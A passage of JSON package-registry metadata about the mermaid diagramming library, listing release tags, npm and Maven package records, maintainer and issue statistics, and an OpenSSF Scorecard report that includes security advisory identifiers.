9","sha":"1a7997cdef01882ea7b46948d58625e904a09094","kind":"tag","published_at":"2014-12-01T20:04:35.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.2.9","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.2.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@0.2.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.2.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.2.9/manifests"},{"name":"0.2.8","sha":"1d2327c4c2ae60692f9bfe8b4d19ea195ebcbb04","kind":"tag","published_at":"2014-12-01T09:01:06.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.2.8","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.2.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@0.2.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.2.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.2.8/manifests"},{"name":"0.2.7","sha":"cbd41dbb1b4875aa3254babca694844908a1ecf7","kind":"tag","published_at":"2014-12-01T08:30:27.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.2.7","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.2.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@0.2.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.2.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.2.7/manifests"},{"name":"0.2.6","sha":"9a35844731426e1f74f64d272ae6398f20424457","kind":"commit","published_at":"2014-11-27T20:28:04.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.2.6","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.2.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@0.2.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.2.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.2.6/manifests"},{"name":"0.2.5","sha":"18be0e02aa80dcad171b26d2e397750100dc7d23","kind":"commit","published_at":"2014-11-27T20:16:17.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.2.5","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.2.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@0.2.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.2.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.2.5/manifests"},{"name":"0.2.4","sha":"9c31ac8aa68bff142e33b63b5ca3217aa8db7f5a","kind":"commit","published_at":"2014-11-25T21:58:57.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.2.4","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.2.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@0.2.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.2.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.2.4/manifests"},{"name":"0.2.3","sha":"d18103a0ec61801ac437a46cecaec81628037bb2","kind":"commit","published_at":"2014-11-24T21:03:32.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.2.3","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.2.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@0.2.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.2.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.2.3/manifests"},{"name":"0.2.2","sha":"cb58aeab2532be6d8bc1eab6503ca752fcf85965","kind":"commit","published_at":"2014-11-22T18:06:04.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.2.2","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@0.2.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.2.2/manifests"},{"name":"0.2.1","sha":"c0a4cfc2d768a7fe0a5d442635b7590054577eeb","kind":"commit","published_at":"2014-11-22T17:36:02.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.2.1","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@0.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.2.1/manifests"},{"name":"0.2.0","sha":"83de219552e39f8ed19a2300f215e1159abcfb33","kind":"commit","published_at":"2014-11-22T16:29:05.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.2.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@0.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.2.0/manifests"},{"name":"0.1.1","sha":"64bedc8262b6e116c344de10968e78a06323d304","kind":"commit","published_at":"2014-11-17T06:50:42.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.1.1","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@0.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.1.1/manifests"},{"name":"0.1.0","sha":"46b45a820976091d3dcf1d99c6a4e8a35e7d9ade","kind":"tag","published_at":"2014-11-16T19:32:58.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.1.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@0.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.1.0/manifests"}]},"repo_metadata_updated_at":"2025-09-01T14:17:50.351Z","dependent_packages_count":0,"downloads":68,"downloads_period":"last-month","dependent_repos_count":0,"rankings":{"downloads":null,"dependent_repos_count":24.027558498457026,"dependent_packages_count":34.663771990601575,"stargazers_count":null,"forks_count":null,"docker_downloads_count":null,"average":29.3456652445293},"purl":"pkg:npm/mermaid-patch-for-node","advisories":[],"docker_usage_url":"https://docker.ecosyste.ms/usage/npm/mermaid-patch-for-node","docker_dependents_count":null,"docker_downloads_count":null,"usage_url":"https://repos.ecosyste.ms/usage/npm/mermaid-patch-for-node","dependent_repositories_url":"https://repos.ecosyste.ms/api/v1/usage/npm/mermaid-patch-for-node/dependencies","status":null,"funding_links":["https://github.com/sponsors/knsv","https://github.com/sponsors/sidharthv96"],"critical":null,"issue_metadata":{"last_synced_at":"2025-09-01T14:01:58.757Z","issues_count":1461,"pull_requests_count":1558,"avg_time_to_close_issue":27677984.852564104,"avg_time_to_close_pull_request":2277072.9893004117,"issues_closed_count":466,"pull_requests_closed_count":1215,"pull_request_authors_count":359,"issue_authors_count":1156,"avg_comments_per_issue":3.5578370978781657,"avg_comments_per_pull_request":4.093709884467266,"merged_pull_requests_count":970,"bot_issues_count":4,"bot_pull_requests_count":290,"past_year_issues_count":428,"past_year_pull_requests_count":712,"past_year_avg_time_to_close_issue":2790098.3866666667,"past_year_avg_time_to_close_pull_request":1391392.070539419,"past_year_issues_closed_count":75,"past_year_pull_requests_closed_count":482,"past_year_pull_request_authors_count":162,"past_year_issue_authors_count":345,"past_year_avg_comments_per_issue":0.7616822429906542,"past_year_avg_comments_per_pull_request":4.254213483146067,"past_year_bot_issues_count":2,"past_year_bot_pull_requests_count":155,"past_year_merged_pull_requests_count":374,"issues_url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/issues","maintainers":[{"login":"sidharthv96","count":251,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/sidharthv96"},{"login":"huynhicode","count":72,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/huynhicode"},{"login":"knsv","count":57,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/knsv"},{"login":"aloisklink","count":37,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/aloisklink"},{"login":"Yokozuna59","count":27,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Yokozuna59"},{"login":"saurabhg772244","count":25,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/saurabhg772244"},{"login":"ashishjain0512","count":18,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ashishjain0512"},{"login":"yari-dewalt","count":15,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/yari-dewalt"},{"login":"Yash-Singh1","count":11,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Yash-Singh1"},{"login":"omkarht","count":10,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/omkarht"},{"login":"rajat-ht","count":8,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/rajat-ht"},{"login":"NicolasNewman","count":7,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/NicolasNewman"},{"login":"shubhamparikh2704","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/shubhamparikh2704"},{"login":"IOrlandoni","count":4,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/IOrlandoni"},{"login":"GDFaber","count":4,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/GDFaber"},{"login":"shubham-mermaid","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/shubham-mermaid"},{"login":"kedar49","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/kedar49"},{"login":"ferozmht","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ferozmht"},{"login":"darshanr0107","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/darshanr0107"},{"login":"Prashant-7718","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Prashant-7718"},{"login":"tylerlong","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/tylerlong"}],"active_maintainers":[{"login":"sidharthv96","count":48,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/sidharthv96"},{"login":"knsv","count":31,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/knsv"},{"login":"saurabhg772244","count":25,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/saurabhg772244"},{"login":"huynhicode","count":22,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/huynhicode"},{"login":"ashishjain0512","count":17,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ashishjain0512"},{"login":"yari-dewalt","count":14,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/yari-dewalt"},{"login":"aloisklink","count":11,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/aloisklink"},{"login":"omkarht","count":10,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/omkarht"},{"login":"rajat-ht","count":8,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/rajat-ht"},{"login":"shubhamparikh2704","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/shubhamparikh2704"},{"login":"NicolasNewman","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/NicolasNewman"},{"login":"IOrlandoni","count":4,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/IOrlandoni"},{"login":"kedar49","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/kedar49"},{"login":"shubham-mermaid","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/shubham-mermaid"},{"login":"darshanr0107","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/darshanr0107"},{"login":"Prashant-7718","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Prashant-7718"},{"login":"ferozmht","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ferozmht"}]},"versions_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/mermaid-patch-for-node/versions","version_numbers_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/mermaid-patch-for-node/version_numbers","dependent_packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/mermaid-patch-for-node/dependent_packages","related_packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/mermaid-patch-for-node/related_packages","maintainers":[{"uuid":"jacob98","login":"jacob98","name":null,"email":"jacob.lcs@qq.com","url":null,"packages_count":41,"html_url":"https://www.npmjs.com/~jacob98","role":null,"created_at":"2025-08-18T12:41:05.221Z","updated_at":"2025-08-18T12:41:05.221Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/maintainers/jacob98/packages"}],"registry":{"name":"npmjs.org","url":"https://registry.npmjs.org","ecosystem":"npm","default":true,"packages_count":5131348,"maintainers_count":1051627,"namespaces_count":313328,"keywords_count":730052,"github":"npm","metadata":{"funded_packages_count":155759},"icon_url":"https://github.com/npm.png","created_at":"2022-04-04T15:19:23.081Z","updated_at":"2025-09-05T07:36:50.205Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages","maintainers_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/maintainers","namespaces_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/namespaces"}},{"id":5002830,"name":"org.webjars.npm:mermaid","ecosystem":"maven","description":"WebJar for mermaid","homepage":"https://www.webjars.org","licenses":"MIT","normalized_licenses":["MIT"],"repository_url":"https://github.com/mermaid-js/mermaid","keywords_array":[],"namespace":"org.webjars.npm","versions_count":29,"first_release_published_at":"2016-08-09T20:34:06.000Z","latest_release_published_at":"2025-05-24T13:49:43.000Z","latest_release_number":"11.6.0","last_synced_at":"2025-09-01T12:55:55.308Z","created_at":"2022-07-27T11:03:29.819Z","updated_at":"2025-09-01T14:17:50.353Z","registry_url":"https://central.sonatype.com/artifact/org.webjars.npm/mermaid/","install_command":null,"documentation_url":"https://appdoc.app/artifact/org.webjars.npm/mermaid/","metadata":{},"repo_metadata":{"id":37269779,"uuid":"26066727","full_name":"mermaid-js/mermaid","owner":"mermaid-js","description":"Generation of diagrams like flowcharts or sequence diagrams from text in a similar manner as markdown","archived":false,"fork":false,"pushed_at":"2025-09-01T12:33:10.000Z","size":254429,"stargazers_count":82566,"open_issues_count":1425,"forks_count":7984,"subscribers_count":651,"default_branch":"develop","last_synced_at":"2025-09-01T12:37:01.437Z","etag":null,"topics":["diagrams","diagrams-as-code","documentation","flowchart","javascript","mindmap","typescript","uml-diagrams"],"latest_commit_sha":null,"homepage":"https://mermaid.js.org","language":"TypeScript","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"mit","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/mermaid-js.png","metadata":{"files":{"readme":"README.md","changelog":"CHANGELOG.md","contributing":"CONTRIBUTING.md","funding":".github/FUNDING.yml","license":"LICENSE","code_of_conduct":"CODE_OF_CONDUCT.md","threat_model":null,"audit":null,"citation":"CITATION.cff","codeowners":null,"security":null,"support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null,"zenodo":null,"notice":null,"maintainers":null,"copyright":null,"agents":null,"dco":null,"cla":null},"funding":{"github":["knsv","sidharthv96"]}},"created_at":"2014-11-01T23:52:32.000Z","updated_at":"2025-09-01T12:31:32.000Z","dependencies_parsed_at":"2023-09-29T07:58:18.084Z","dependency_job_id":"8c149ccb-df9c-4cb4-9e51-2f99157720cd","html_url":"https://github.com/mermaid-js/mermaid","commit_stats":{"total_commits":8230,"total_committers":688,"mean_commits":"11.962209302325581","dds":0.823086269744836,"last_synced_commit":"b3dee343d1536c8425539643c345a63ff58f59f4"},"previous_names":["knsv/mermaid"],"tags_count":181,"template":false,"template_full_name":null,"purl":"pkg:github/mermaid-js/mermaid","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/mermaid-js","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/refs/heads/develop","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/sbom","scorecard":{"id":355670,"data":{"date":"2025-08-17T15:35:22Z","repo":{"name":"github.com/mermaid-js/mermaid","commit":"1f46c9e9bb556f9c321118407d0fa6788746e8b9"},"scorecard":{"version":"v5.1.1","commit":"cd152cb6742c5b8f2f3d2b5193b41d9c50905198"},"score":6.7,"checks":[{"name":"Dependency-Update-Tool","score":10,"reason":"update tool detected","details":["Info: detected update tool: RenovateBot: renovate.json:1"],"documentation":{"short":"Determines if the project uses a dependency update tool.","url":"https://github.com/ossf/scorecard/blob/cd152cb6742c5b8f2f3d2b5193b41d9c50905198/docs/checks.md#dependency-update-tool"}},{"name":"Maintained","score":10,"reason":"30 commit(s) and 7 issue activity found in the last 90 days -- score normalized to 10","details":null,"documentation":{"short":"Determines if the project is \"actively maintained\".","url":"https://github.com/ossf/scorecard/blob/cd152cb6742c5b8f2f3d2b5193b41d9c50905198/docs/checks.md#maintained"}},{"name":"Dangerous-Workflow","score":10,"reason":"no dangerous workflow patterns detected","details":null,"documentation":{"short":"Determines if the project's GitHub Action workflows avoid dangerous patterns.","url":"https://github.com/ossf/scorecard/blob/cd152cb6742c5b8f2f3d2b5193b41d9c50905198/docs/checks.md#dangerous-workflow"}},{"name":"Packaging","score":-1,"reason":"packaging workflow not detected","details":["Warn: no GitHub/GitLab publishing workflow detected."],"documentation":{"short":"Determines if the project is published as a package that others can easily download, install, easily update, and uninstall.","url":"https://github.com/ossf/scorecard/blob/cd152cb6742c5b8f2f3d2b5193b41d9c50905198/docs/checks.md#packaging"}},{"name":"Code-Review","score":10,"reason":"all changesets reviewed","details":null,"documentation":{"short":"Determines if the project requires human code review before pull requests (aka merge requests) are merged.","url":"https://github.com/ossf/scorecard/blob/cd152cb6742c5b8f2f3d2b5193b41d9c50905198/docs/checks.md#code-review"}},{"name":"Binary-Artifacts","score":10,"reason":"no binaries found in the repo","details":null,"documentation":{"short":"Determines if the project has generated executable (binary) artifacts in the source repository.","url":"https://github.com/ossf/scorecard/blob/cd152cb6742c5b8f2f3d2b5193b41d9c50905198/docs/checks.md#binary-artifacts"}},{"name":"Token-Permissions","score":0,"reason":"detected GitHub workflow tokens with excessive permissions","details":["Info: jobLevel 'actions' permission set to 'read': .github/workflows/codeql.yml:22","Info: jobLevel 'contents' permission set to 'read': .github/workflows/codeql.yml:23","Info: jobLevel 'contents' permission set to 'read': .github/workflows/link-checker.yml:30","Info: jobLevel 'contents' permission set to 'read': .github/workflows/pr-labeler.yml:21","Info: jobLevel 'contents' permission set to 'read': .github/workflows/release-preview.yml:21","Warn: jobLevel 'contents' permission set to 'write': .github/workflows/release.yml:17","Info: topLevel 'contents' permission set to 'read': .github/workflows/autofix.yml:8","Info: topLevel 'contents' permission set to 'read': .github/workflows/build-docs.yml:14","Info: topLevel 'contents' permission set to 'read': .github/workflows/check-readme-in-sync.yml:14","Info: topLevel 'contents' permission set to 'read': .github/workflows/codeql.yml:15","Info: topLevel 'contents' permission set to 'read': .github/workflows/dependency-review.yml:11","Info: topLevel 'contents' permission set to 'read': .github/workflows/e2e-applitools.yml:17","Warn: topLevel 'contents' permission set to 'write': .github/workflows/e2e-timings.yml:13","Info: topLevel 'contents' permission set to 'read': .github/workflows/e2e.yml:15","Info: topLevel 'contents' permission set to 'read': .github/workflows/issue-triage.yml:8","Info: topLevel 'contents' permission set to 'read': .github/workflows/link-checker.yml:23","Warn: topLevel 'contents' permission set to 'write': .github/workflows/lint.yml:12","Info: topLevel 'contents' permission set to 'read': .github/workflows/pr-labeler.yml:15","Info: topLevel 'contents' permission set to 'read': .github/workflows/publish-docs.yml:11","Warn: no topLevel permission defined: .github/workflows/release-preview-publish.yml:1","Warn: topLevel 'actions' permission set to 'write': .github/workflows/release-preview.yml:14","Info: topLevel 'contents' permission set to 'read': .github/workflows/release-preview.yml:13","Info: topLevel 'contents' permission set to 'read': .github/workflows/release.yml:11","Info: topLevel permissions set to 'read-all': .github/workflows/scorecard.yml:9","Info: topLevel 'contents' permission set to 'read': .github/workflows/test.yml:6","Warn: no topLevel permission defined: .github/workflows/unlock-reopened-issues.yml:1","Warn: no topLevel permission defined: .github/workflows/update-browserlist.yml:1","Warn: no topLevel permission defined: .github/workflows/validate-lockfile.yml:1"],"documentation":{"short":"Determines if the project's workflows follow the principle of least privilege.","url":"https://github.com/ossf/scorecard/blob/cd152cb6742c5b8f2f3d2b5193b41d9c50905198/docs/checks.md#token-permissions"}},{"name":"Pinned-Dependencies","score":9,"reason":"dependency not pinned by hash detected -- score normalized to 9","details":["Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/validate-lockfile.yml:15: update your workflow using https://app.stepsecurity.io/secureworkflow/mermaid-js/mermaid/validate-lockfile.yml/develop?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/validate-lockfile.yml:20: update your workflow using https://app.stepsecurity.io/secureworkflow/mermaid-js/mermaid/validate-lockfile.yml/develop?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/validate-lockfile.yml:60: update your workflow using https://app.stepsecurity.io/secureworkflow/mermaid-js/mermaid/validate-lockfile.yml/develop?enable=pin","Warn: npmCommand not pinned by hash: .github/workflows/release-preview-publish.yml:32","Info:  45 out of  47 GitHub-owned GitHubAction dependencies pinned","Info:  35 out of  36 third-party GitHubAction dependencies pinned","Info:   1 out of   1 containerImage dependencies pinned","Info:   0 out of   1 npmCommand dependencies pinned"],"documentation":{"short":"Determines if the project has declared and pinned the dependencies of its build process.","url":"https://github.com/ossf/scorecard/blob/cd152cb6742c5b8f2f3d2b5193b41d9c50905198/docs/checks.md#pinned-dependencies"}},{"name":"CII-Best-Practices","score":0,"reason":"no effort to earn an OpenSSF best practices badge detected","details":null,"documentation":{"short":"Determines if the project has an OpenSSF (formerly CII) Best Practices Badge.","url":"https://github.com/ossf/scorecard/blob/cd152cb6742c5b8f2f3d2b5193b41d9c50905198/docs/checks.md#cii-best-practices"}},{"name":"Signed-Releases","score":-1,"reason":"no releases found","details":null,"documentation":{"short":"Determines if the project cryptographically signs release artifacts.","url":"https://github.com/ossf/scorecard/blob/cd152cb6742c5b8f2f3d2b5193b41d9c50905198/docs/checks.md#signed-releases"}},{"name":"Fuzzing","score":0,"reason":"project is not fuzzed","details":["Warn: no fuzzer integrations found"],"documentation":{"short":"Determines if the project uses fuzzing.","url":"https://github.com/ossf/scorecard/blob/cd152cb6742c5b8f2f3d2b5193b41d9c50905198/docs/checks.md#fuzzing"}},{"name":"License","score":10,"reason":"license file detected","details":["Info: project has a license file: LICENSE:0","Info: FSF or OSI recognized license: MIT License: LICENSE:0"],"documentation":{"short":"Determines if the project has defined a license.","url":"https://github.com/ossf/scorecard/blob/cd152cb6742c5b8f2f3d2b5193b41d9c50905198/docs/checks.md#license"}},{"name":"SAST","score":9,"reason":"SAST tool detected but not run on all commits","details":["Info: SAST configuration detected: CodeQL","Warn: 28 commits out of 30 are checked with a SAST tool"],"documentation":{"short":"Determines if the project uses static code analysis.","url":"https://github.com/ossf/scorecard/blob/cd152cb6742c5b8f2f3d2b5193b41d9c50905198/docs/checks.md#sast"}},{"name":"Security-Policy","score":10,"reason":"security policy file detected","details":["Info: security policy file detected: github.com/mermaid-js/.github/SECURITY.md:1","Info: Found linked content: github.com/mermaid-js/.github/SECURITY.md:1","Info: Found disclosure, vulnerability, and/or timelines in security policy: github.com/mermaid-js/.github/SECURITY.md:1","Info: Found text in security policy: github.com/mermaid-js/.github/SECURITY.md:1"],"documentation":{"short":"Determines if the project has published a security policy.","url":"https://github.com/ossf/scorecard/blob/cd152cb6742c5b8f2f3d2b5193b41d9c50905198/docs/checks.md#security-policy"}},{"name":"Branch-Protection","score":1,"reason":"branch protection is not maximal on development and all release branches","details":["Warn: branch protection not enabled for branch 'release/10.9.3'","Warn: branch protection not enabled for branch 'release/10.9.2'","Info: 'allow deletion' disabled on branch 'develop'","Info: 'force pushes' disabled on branch 'develop'","Warn: branch 'develop' does not require approvers","Warn: codeowners review is not required on branch 'develop'","Info: status check found to merge onto on branch 'develop'"],"documentation":{"short":"Determines if the default and release branches are protected with GitHub's branch protection settings.","url":"https://github.com/ossf/scorecard/blob/cd152cb6742c5b8f2f3d2b5193b41d9c50905198/docs/checks.md#branch-protection"}},{"name":"CI-Tests","score":9,"reason":"11 out of 12 merged PRs checked by a CI test -- score normalized to 9","details":null,"documentation":{"short":"Determines if the project runs tests before pull requests are merged.","url":"https://github.com/ossf/scorecard/blob/cd152cb6742c5b8f2f3d2b5193b41d9c50905198/docs/checks.md#ci-tests"}},{"name":"Contributors","score":10,"reason":"project has 15 contributing companies or organizations","details":["Info: found contributions from: Mermaid-Chart, OSDKDev, argoproj, check-spelling, evolutionizer, fossgect, garnercorp, gecthrissur, john deere, mermaid chart, mermaid-chart, mermaid-js, plantuml-stdlib, ringcentral, sarva"],"documentation":{"short":"Determines if the project has a set of contributors from multiple organizations (e.g., companies).","url":"https://github.com/ossf/scorecard/blob/cd152cb6742c5b8f2f3d2b5193b41d9c50905198/docs/checks.md#contributors"}},{"name":"Vulnerabilities","score":0,"reason":"23 existing vulnerabilities detected","details":["Warn: Project is vulnerable to: GHSA-968p-4wvh-cqc8","Warn: Project is vulnerable to: GHSA-xffm-g5w8-qvg7","Warn: Project is vulnerable to: GHSA-jr5f-v2jv-69x6","Warn: Project is vulnerable to: GHSA-v6h2-p8h4-qcjw","Warn: Project is vulnerable to: GHSA-pxg6-pf52-xh8x","Warn: Project is vulnerable to: GHSA-3xgq-45jj-v275","Warn: Project is vulnerable to: GHSA-67mh-4wv8-2f99","Warn: Project is vulnerable to: GHSA-mg2h-6x62-wpwc","Warn: Project is vulnerable to: GHSA-fjxv-7rqg-78g4","Warn: Project is vulnerable to: GHSA-4www-5p9h-95mh","Warn: Project is vulnerable to: GHSA-9gqv-wp59-fq42","Warn: Project is vulnerable to: GHSA-76c9-3jph-rj3q","Warn: Project is vulnerable to: GHSA-rhx6-c78j-4q9w","Warn: Project is vulnerable to: GHSA-52f5-9888-hmc6","Warn: Project is vulnerable to: GHSA-c76h-2ccp-4975","Warn: Project is vulnerable to: GHSA-cxrh-j4jr-qwg3","Warn: Project is vulnerable to: GHSA-x574-m823-4x7w","Warn: Project is vulnerable to: GHSA-4r4m-qw57-chr8","Warn: Project is vulnerable to: GHSA-xcj6-pq6g-qj4x","Warn: Project is vulnerable to: GHSA-356w-63v5-8wf4","Warn: Project is vulnerable to: GHSA-859w-5945-r5v3","Warn: Project is vulnerable to: GHSA-4v9v-hfq4-rm2v","Warn: Project is vulnerable to: GHSA-9jgg-88mc-972h"],"documentation":{"short":"Determines if the project has open, known unfixed 